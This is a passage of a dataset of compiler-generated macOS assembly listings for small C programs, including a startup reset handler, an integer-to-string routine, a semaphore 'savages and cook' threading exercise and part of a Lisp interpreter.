__TEXT,__cstring,cstring_literals L_.str.1: ## @.str.1 .asciz "r" L_.str.2: ## @.str.2 .asciz "%s: can't run %s\n" L_.str.3: ## @.str.3 .asciz "%s" L_.str.4: ## @.str.4 .asciz "%s? " L_.str.5: ## @.str.5 .asciz "%d" L_.str.6: ## @.str.6 .asciz "%s: can't open file %s mode %s\n" .zerofill __DATA,__bss,_ttyin.tty,8,3 ## @ttyin.tty L_.str.7: ## @.str.7 .asciz "/dev/tty" .subsections_via_symbols
the_stack_data/60658.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _Reset_Handler ; -- Begin function Reset_Handler .p2align 2 _Reset_Handler: ; @Reset_Handler .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___data_image@GOTPAGE ldr x8, [x8, ___data_image@GOTPAGEOFF] str x8, [sp, #8] adrp x8, ___data_section_start@GOTPAGE ldr x8, [x8, ___data_section_start@GOTPAGEOFF] str x8, [sp] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp] adrp x9, ___data_image_end@GOTPAGE ldr x9, [x9, ___data_image_end@GOTPAGEOFF] subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #8] add x9, x8, #1 str x9, [sp, #8] ldrb w8, [x8] ldr x9, [sp] add x10, x9, #1 str x10, [sp] strb w8, [x9] b LBB0_1 LBB0_3: adrp x8, __start_of_bss@GOTPAGE ldr x8, [x8, __start_of_bss@GOTPAGEOFF] str x8, [sp, #8] b LBB0_4 LBB0_4: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] adrp x9, __end_of_bss@GOTPAGE ldr x9, [x9, __end_of_bss@GOTPAGEOFF] subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_4 Depth=1 ldr x8, [sp, #8] add x9, x8, #1 str x9, [sp, #8] strb wzr, [x8] b LBB0_4 LBB0_6: bl _main b LBB0_7 LBB0_7: ; =>This Inner Loop Header: Depth=1 b LBB0_7 .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _Reset_Handler ## -- Begin function Reset_Handler .p2align 4, 0x90 _Reset_Handler: ## @Reset_Handler .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq ___data_image@GOTPCREL(%rip), %rax movq %rax, -8(%rbp) movq ___data_section_start@GOTPCREL(%rip), %rax movq %rax, -16(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movq ___data_image_end@GOTPCREL(%rip), %rax cmpq %rax, -16(%rbp) jae LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movq %rax, %rcx addq $1, %rcx movq %rcx, -8(%rbp) movb (%rax), %cl movq -16(%rbp), %rax movq %rax, %rdx addq $1, %rdx movq %rdx, -16(%rbp) movb %cl, (%rax) jmp LBB0_1 LBB0_3: movq __start_of_bss@GOTPCREL(%rip), %rax movq %rax, -8(%rbp) LBB0_4: ## =>This Inner Loop Header: Depth=1 movq __end_of_bss@GOTPCREL(%rip), %rax cmpq %rax, -8(%rbp) jae LBB0_6 ## %bb.5: ## in Loop: Header=BB0_4 Depth=1 movq -8(%rbp), %rax movq %rax, %rcx addq $1, %rcx movq %rcx, -8(%rbp) movb $0, (%rax) jmp LBB0_4 LBB0_6: callq _main LBB0_7: ## =>This Inner Loop Header: Depth=1 jmp LBB0_7 .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/159516281.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _intToString ; -- Begin function intToString .p2align 2 _intToString: ; @intToString .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str w0, [sp, #28] str x1, [sp, #16] str wzr, [sp, #12] ldr w8, [sp, #28] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_11 b LBB0_1 LBB0_1: ldr w8, [sp, #28] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ldr w9, [sp, #28] mov w8, #0 subs w8, w8, w9 str w8, [sp, #28] ldr x9, [sp, #16] mov w8, #45 strb w8, [x9] ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_3 LBB0_3: b LBB0_4 LBB0_4: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_4 Depth=1 ldr w8, [sp, #28] mov w9, #10 sdiv w10, w8, w9 mul w10, w10, w9 subs w8, w8, w10 add w8, w8, #48 ldr x10, [sp, #16] ldrsw x11, [sp, #12] strb w8, [x10, x11] ldr w8, [sp, #28] sdiv w8, w8, w9 str w8, [sp, #28] ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_4 LBB0_6: str wzr, [sp, #4] b LBB0_7 LBB0_7: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] ldr w9, [sp, #12] mov w10, #2 sdiv w9, w9, w10 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_10 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_7 Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #4] add x8, x8, x9 ldrb w8, [x8] strb w8, [sp, #11] ldr x8, [sp, #16] ldr w9, [sp, #12] ldr w10, [sp, #4] subs w9, w9, w10 subs w9, w9, #1 add x8, x8, w9, sxtw ldrb w8, [x8] ldr x9, [sp, #16] ldrsw x10, [sp, #4] add x9, x9, x10 strb w8, [x9] ldrb w8, [sp, #11] ldr x9, [sp, #16] ldr w10, [sp, #12] ldr w11, [sp, #4] subs w10, w10, w11 subs w10, w10, #1 add x9, x9, w10, sxtw strb w8, [x9] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_7 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB0_7 LBB0_10: ldr x8, [sp, #16] ldrsw x9, [sp, #12] add x8, x8, x9 strb wzr, [x8] b LBB0_12 LBB0_11: ldr x9, [sp, #16] mov w8, #48 strb w8, [x9] b LBB0_12 LBB0_12: add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _intToString ## -- Begin function intToString .p2align 4, 0x90 _intToString: ## @intToString .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movl $0, -20(%rbp) cmpl $0, -4(%rbp) je LBB0_11 ## %bb.1: cmpl $0, -4(%rbp) jge LBB0_3 ## %bb.2: xorl %eax, %eax subl -4(%rbp), %eax movl %eax, -4(%rbp) movq -16(%rbp), %rax movb $45, (%rax) movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) LBB0_3: jmp LBB0_4 LBB0_4: ## =>This Inner Loop Header: Depth=1 cmpl $0, -4(%rbp) je LBB0_6 ## %bb.5: ## in Loop: Header=BB0_4 Depth=1 movl -4(%rbp), %eax movl $10, %ecx cltd idivl %ecx addl $48, %edx ## kill: def $dl killed $dl killed $edx movq -16(%rbp), %rax movslq -20(%rbp), %rcx movb %dl, (%rax,%rcx) movl -4(%rbp), %eax movl $10, %ecx cltd idivl %ecx movl %eax, -4(%rbp) movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB0_4 LBB0_6: movl $0, -28(%rbp) LBB0_7: ## =>This Inner Loop Header: Depth=1 movl -28(%rbp), %eax movl %eax, -32(%rbp) ## 4-byte Spill movl -20(%rbp), %eax movl $2, %ecx cltd idivl %ecx movl %eax, %ecx movl -32(%rbp), %eax ## 4-byte Reload cmpl %ecx, %eax jge LBB0_10 ## %bb.8: ## in Loop: Header=BB0_7 Depth=1 movq -16(%rbp), %rax movslq -28(%rbp), %rcx movb (%rax,%rcx), %al movb %al, -21(%rbp) movq -16(%rbp), %rax movl -20(%rbp), %ecx subl -28(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movb (%rax,%rcx), %dl movq -16(%rbp), %rax movslq -28(%rbp), %rcx movb %dl, (%rax,%rcx) movb -21(%rbp), %dl movq -16(%rbp), %rax movl -20(%rbp), %ecx subl -28(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movb %dl, (%rax,%rcx) ## %bb.9: ## in Loop: Header=BB0_7 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB0_7 LBB0_10: movq -16(%rbp), %rax movslq -20(%rbp), %rcx movb $0, (%rax,%rcx) jmp LBB0_12 LBB0_11: movq -16(%rbp), %rax movb $48, (%rax) LBB0_12: popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/34514010.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _savage ; -- Begin function savage .p2align 2 _savage: ; @savage .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 adrp x8, _humans_devoured@PAGE ldr w8, [x8, _humans_devoured@PAGEOFF] subs w8, w8, #15 cset w8, ge tbnz w8, #0, LBB0_5 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf adrp x0, _mutex@GOTPAGE ldr x0, [x0, _mutex@GOTPAGEOFF] bl _sem_wait adrp x8, _servings@PAGE ldr w8, [x8, _servings@PAGEOFF] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 adrp x0, _empty@GOTPAGE ldr x0, [x0, _empty@GOTPAGEOFF] bl _sem_post adrp x0, _full@GOTPAGE ldr x0, [x0, _full@GOTPAGEOFF] bl _sem_wait adrp x9, _servings@PAGE ldr w8, [x9, _servings@PAGEOFF] add w8, w8, #5 str w8, [x9, _servings@PAGEOFF] b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf adrp x9, _servings@PAGE ldr w8, [x9, _servings@PAGEOFF] subs w8, w8, #1 str w8, [x9, _servings@PAGEOFF] adrp x9, _humans_devoured@PAGE ldr w8, [x9, _humans_devoured@PAGEOFF] mov w10, #1 str w10, [sp, #4] ; 4-byte Folded Spill add w8, w8, #1 str w8, [x9, _humans_devoured@PAGEOFF] adrp x0, _mutex@GOTPAGE ldr x0, [x0, _mutex@GOTPAGEOFF] bl _sem_post adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr w0, [sp, #4] ; 4-byte Folded Reload bl _sleep b LBB0_1 LBB0_5: mov x0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _cook ; -- Begin function cook .p2align 2 _cook: ; @cook .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 adrp x8, _humans_in_captivity@PAGE ldr w8, [x8, _humans_in_captivity@PAGEOFF] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 adrp x0, _empty@GOTPAGE ldr x0, [x0, _empty@GOTPAGEOFF] bl _sem_wait adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov w0, #2 bl _sleep adrp x9, _humans_in_captivity@PAGE ldr w8, [x9, _humans_in_captivity@PAGEOFF] subs w8, w8, #5 str w8, [x9, _humans_in_captivity@PAGEOFF] mov x9, sp mov x8, #5 str x8, [x9] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf adrp x0, _full@GOTPAGE ldr x0, [x0, _full@GOTPAGEOFF] bl _sem_post b LBB1_1 LBB1_3: mov x0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] mov w8, #0 str w8, [sp, #12] ; 4-byte Folded Spill stur wzr, [x29, #-36] stur w0, [x29, #-40] str x1, [sp, #48] adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x0, [x8] mov x1, #0 str x1, [sp, #16] ; 8-byte Folded Spill bl _setbuf ldr w1, [sp, #12] ; 4-byte Folded Reload adrp x0, _mutex@GOTPAGE ldr x0, [x0, _mutex@GOTPAGEOFF] mov w2, #1 bl _sem_init ldr w2, [sp, #12] ; 4-byte Folded Reload adrp x0, _empty@GOTPAGE ldr x0, [x0, _empty@GOTPAGEOFF] mov x1, x2 bl _sem_init ldr w2, [sp, #12] ; 4-byte Folded Reload adrp x0, _full@GOTPAGE ldr x0, [x0, _full@GOTPAGEOFF] mov x1, x2 bl _sem_init ldr x3, [sp, #16] ; 8-byte Folded Reload mov w8, #3 str w8, [sp, #44] add x0, sp, #32 mov x1, x3 adrp x2, _cook@PAGE add x2, x2, _cook@PAGEOFF bl _pthread_create str wzr, [sp, #28] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB2_4 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldrsw x9, [sp, #28] sub x8, x29, #32 add x0, x8, x9, lsl #3 mov x3, #0 mov x1, x3 adrp x2, _savage@PAGE add x2, x2, _savage@PAGEOFF bl _pthread_create b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB2_1 LBB2_4: str wzr, [sp, #24] b LBB2_5 LBB2_5: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #24] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB2_8 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_5 Depth=1 ldrsw x9, [sp, #24] sub x8, x29, #32 ldr x0, [x8, x9, lsl #3] mov x1, #0 bl _pthread_join b LBB2_7 LBB2_7: ; in Loop: Header=BB2_5 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB2_5 LBB2_8: ldr x0, [sp, #32] mov x1, #0 bl _pthread_join adrp x0, _mutex@GOTPAGE ldr x0, [x0, _mutex@GOTPAGEOFF] bl _sem_destroy adrp x0, _empty@GOTPAGE ldr x0, [x0, _empty@GOTPAGEOFF] bl _sem_destroy adrp x0, _full@GOTPAGE ldr x0, [x0, _full@GOTPAGEOFF] bl _sem_destroy adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf ldur w8, [x29, #-36] str w8, [sp, #8] ; 4-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB2_10 b LBB2_9 LBB2_9: bl ___stack_chk_fail LBB2_10: ldr w0, [sp, #8] ; 4-byte Folded Reload ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .globl _servings ; @servings .zerofill __DATA,__common,_servings,4,2 .section __DATA,__data .globl _humans_in_captivity ; @humans_in_captivity .p2align 2 _humans_in_captivity: .long 15 ; 0xf .globl _humans_devoured ; @humans_devoured .zerofill __DATA,__common,_humans_devoured,4,2 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Savage waiting to eat\n" .comm _mutex,4,2 ; @mutex .comm _empty,4,2 ; @empty .comm _full,4,2 ; @full l_.str.1: ; @.str.1 .asciz "Savage eating a human, nom nom nom nom....\n" l_.str.2: ; @.str.2 .asciz "Savage done eating, time to sleep\n" l_.str.3: ; @.str.3 .asciz "Cook is awake: Ready to cook delicious humans...\n" l_.str.4: ; @.str.4 .asciz "Cook added %d servings to the pot\n" l_.str.5: ; @.str.5 .asciz ">>>>>>>>> ALL DONE <<<<<<<<\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _savage ## -- Begin function savage .p2align 4, 0x90 _savage: ## @savage .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $15, _humans_devoured(%rip) jge LBB0_5 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq _mutex@GOTPCREL(%rip), %rdi callq _sem_wait cmpl $0, _servings(%rip) jne LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movq _empty@GOTPCREL(%rip), %rdi callq _sem_post movq _full@GOTPCREL(%rip), %rdi callq _sem_wait movl _servings(%rip), %eax addl $5, %eax movl %eax, _servings(%rip) LBB0_4: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl _servings(%rip), %eax addl $-1, %eax movl %eax, _servings(%rip) movl _humans_devoured(%rip), %eax addl $1, %eax movl %eax, _humans_devoured(%rip) movq _mutex@GOTPCREL(%rip), %rdi callq _sem_post leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $1, %edi callq _sleep jmp LBB0_1 LBB0_5: xorl %eax, %eax ## kill: def $rax killed $eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _cook ## -- Begin function cook .p2align 4, 0x90 _cook: ## @cook .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, _humans_in_captivity(%rip) jle LBB1_3 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq _empty@GOTPCREL(%rip), %rdi callq _sem_wait leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movl $2, %edi callq _sleep movl _humans_in_captivity(%rip), %eax subl $5, %eax movl %eax, _humans_in_captivity(%rip) leaq L_.str.4(%rip), %rdi movl $5, %esi movb $0, %al callq _printf movq _full@GOTPCREL(%rip), %rdi callq _sem_post jmp LBB1_1 LBB1_3: xorl %eax, %eax ## kill: def $rax killed $eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -36(%rbp) movl %edi, -40(%rbp) movq %rsi, -48(%rbp) movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi xorl %eax, %eax movl %eax, %esi callq _setbuf movq _mutex@GOTPCREL(%rip), %rdi xorl %esi, %esi movl $1, %edx callq _sem_init movq _empty@GOTPCREL(%rip), %rdi xorl %edx, %edx movl %edx, %esi callq _sem_init movq _full@GOTPCREL(%rip), %rdi xorl %edx, %edx movl %edx, %esi callq _sem_init movl $3, -52(%rbp) leaq -64(%rbp), %rdi xorl %eax, %eax movl %eax, %ecx leaq _cook(%rip), %rdx movq %rcx, %rsi callq _pthread_create movl $0, -68(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 cmpl $3, -68(%rbp) jge LBB2_4 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movslq -68(%rbp), %rax leaq -32(%rbp), %rdi shlq $3, %rax addq %rax, %rdi xorl %eax, %eax movl %eax, %ecx leaq _savage(%rip), %rdx movq %rcx, %rsi callq _pthread_create ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movl -68(%rbp), %eax addl $1, %eax movl %eax, -68(%rbp) jmp LBB2_1 LBB2_4: movl $0, -72(%rbp) LBB2_5: ## =>This Inner Loop Header: Depth=1 cmpl $3, -72(%rbp) jge LBB2_8 ## %bb.6: ## in Loop: Header=BB2_5 Depth=1 movslq -72(%rbp), %rax movq -32(%rbp,%rax,8), %rdi xorl %eax, %eax movl %eax, %esi callq _pthread_join ## %bb.7: ## in Loop: Header=BB2_5 Depth=1 movl -72(%rbp), %eax addl $1, %eax movl %eax, -72(%rbp) jmp LBB2_5 LBB2_8: movq -64(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _pthread_join movq _mutex@GOTPCREL(%rip), %rdi callq _sem_destroy movq _empty@GOTPCREL(%rip), %rdi callq _sem_destroy movq _full@GOTPCREL(%rip), %rdi callq _sem_destroy leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf movl -36(%rbp), %eax movl %eax, -76(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_10 ## %bb.9: movl -76(%rbp), %eax ## 4-byte Reload addq $80, %rsp popq %rbp retq LBB2_10: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _servings ## @servings .zerofill __DATA,__common,_servings,4,2 .section __DATA,__data .globl _humans_in_captivity ## @humans_in_captivity .p2align 2 _humans_in_captivity: .long 15 ## 0xf .globl _humans_devoured ## @humans_devoured .zerofill __DATA,__common,_humans_devoured,4,2 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Savage waiting to eat\n" .comm _mutex,4,2 ## @mutex .comm _empty,4,2 ## @empty .comm _full,4,2 ## @full L_.str.1: ## @.str.1 .asciz "Savage eating a human, nom nom nom nom....\n" L_.str.2: ## @.str.2 .asciz "Savage done eating, time to sleep\n" L_.str.3: ## @.str.3 .asciz "Cook is awake: Ready to cook delicious humans...\n" L_.str.4: ## @.str.4 .asciz "Cook added %d servings to the pot\n" L_.str.5: ## @.str.5 .asciz ">>>>>>>>> ALL DONE <<<<<<<<\n" .subsections_via_symbols
the_stack_data/248581187.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/95449641.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] str x8, [sp, #32] ; 8-byte Folded Spill adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] str x8, [sp, #40] ; 8-byte Folded Spill stur wzr, [x29, #-4] mov x0, #0 bl _time adrp x8, _time1@GOTPAGE ldr x8, [x8, _time1@GOTPAGEOFF] str x0, [x8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf bl _initialize_atoms b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF str x0, [sp, #24] ; 8-byte Folded Spill bl _printf mov x0, #1 mov x1, #0 bl _in mov x8, x0 ldr x0, [sp, #24] ; 8-byte Folded Reload stur x8, [x29, #-16] bl _printf ldr x9, [sp, #40] ; 8-byte Folded Reload ldr x8, [sp, #32] ; 8-byte Folded Reload ldur x10, [x29, #-16] ldr x10, [x8, x10, lsl #3] stur x10, [x29, #-24] ldur x10, [x29, #-16] ldr x10, [x9, x10, lsl #3] ldr x10, [x8, x10, lsl #3] stur x10, [x29, #-32] ldur x10, [x29, #-16] ldr x10, [x9, x10, lsl #3] ldr x9, [x9, x10, lsl #3] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-40] ldur x8, [x29, #-24] adrp x9, _wrd_define@GOTPAGE ldr x9, [x9, _wrd_define@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB0_6 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur x9, [x29, #-32] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 b LBB0_5 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #32] ; 8-byte Folded Reload ldr x9, [sp, #40] ; 8-byte Folded Reload ldur x10, [x29, #-32] ldr x9, [x9, x10, lsl #3] str x9, [sp, #48] ldur x9, [x29, #-32] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-32] adrp x8, _wrd_lambda@GOTPAGE ldr x8, [x8, _wrd_lambda@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #16] ; 8-byte Folded Spill ldr x8, [sp, #48] str x8, [sp, #8] ; 8-byte Folded Spill ldur x0, [x29, #-40] mov x1, #0 bl _cons mov x1, x0 ldr x0, [sp, #8] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-40] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldur x1, [x29, #-32] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _out ldur x1, [x29, #-40] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _out ldr x9, [sp, #32] ; 8-byte Folded Reload ldur x8, [x29, #-40] ldur x11, [x29, #-32] adrp x10, _vlst@GOTPAGE ldr x10, [x10, _vlst@GOTPAGEOFF] ldr x10, [x10, x11, lsl #3] str x8, [x9, x10, lsl #3] b LBB0_1 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldur x1, [x29, #-16] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _out stur x0, [x29, #-16] ldur x0, [x29, #-16] bl _ev mov x1, x0 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _out stur x0, [x29, #-16] b LBB0_1 .cfi_endproc ; -- End function .globl _initialize_atoms ; -- Begin function initialize_atoms .p2align 2 _initialize_atoms: ; @initialize_atoms .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov x2, #0 stur x2, [x29, #-16] ; 8-byte Folded Spill mov x0, x2 adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _mk_atom ldur x8, [x29, #-16] ; 8-byte Folded Reload subs x8, x8, x0 cset w8, eq tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf mov w0, #0 bl _exit LBB1_2: mov x2, #0 stur x2, [x29, #-24] ; 8-byte Folded Spill mov x0, x2 adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _wrd_nil@GOTPAGE ldr x8, [x8, _wrd_nil@GOTPAGEOFF] str x0, [x8] ldr x9, [x8] adrp x8, _vlst@GOTPAGE ldr x8, [x8, _vlst@GOTPAGEOFF] ldr x9, [x8, x9, lsl #3] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] str x2, [x8, x9, lsl #3] mov x0, x2 adrp x1, l_.str.8@PAGE add x1, x1, l_.str.8@PAGEOFF bl _mk_atom ldur x2, [x29, 